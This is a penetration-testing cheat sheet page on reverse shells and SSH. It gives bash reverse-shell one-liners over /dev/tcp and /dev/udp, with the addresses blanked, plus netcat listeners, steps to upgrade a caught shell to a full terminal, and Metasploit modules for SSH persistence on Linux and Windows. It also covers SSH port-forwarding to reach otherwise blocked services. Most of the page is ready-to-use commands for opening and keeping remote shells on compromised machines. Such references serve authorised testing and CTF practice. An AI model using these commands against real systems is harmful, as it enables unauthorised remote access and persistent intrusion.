Reverse Shells and SSH

Bash TCP quick reference:
bash -i >& /dev/tcp/ 0>&1
0<&196;exec 196<>/dev/tcp/; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/ 0<&1 2>&1
Bash UDP quick reference:
sh -i >& /dev/udp/ 0>&1

Netcat TCP listener (local verbose numeric-ip port) on 4444
sudo nc -lvnp 4444
Netcat UDP listener
nc -u -lvp 4444
Terminal Upgrade (choose one)
python3 -c 'import pty;pty.spawn("/bin/bash")'
/usr/bin/script -qc /bin/bash /dev/null

In the target machines' shell, enter:
export TERM=xterm
then press CTRL + Z to background your hosts' shell, followed by:
stty raw -echo; fg
stty raw -echo; fg - transfers the raw characters rather than waiting for you to press return, fg brings the reverse shell to the foreground.

Metasploit has the following two post modules:
Linux: post/linux/manage/sshkey_persistence
Windows: post/windows/manage/install_ssh

If you are able to SSH into a device, but unable to connect to another port (for example, port 5555 on android devices), you can port forward, resulting in the traffic using an ssh tunnel.
The following example listens (-L) to traffic on port 5555 locally, sends it through the SSH tunnel, before releasing it to port 5555, on the remote machine.
ssh -L 5555: -p ssh_port [email protected]
Then, when you execute the following command (in another terminal), all traffic will be forwarded over ssh to the remote device.
adb connect
SSH Tunneling also works for web browsing, just switch up the ports and proxy settings!

Interactive shell from Unix to Windows using rlwrap. Execute the following command on the Unix box.
sudo rlwrap nc -lvnp [port]
Copy link
On this page
Attack Box
Further terminal upgrading (clear, autocomplete, arrow key usage)
SSH persistence
SSH Tunneling
Interactive Windows Shell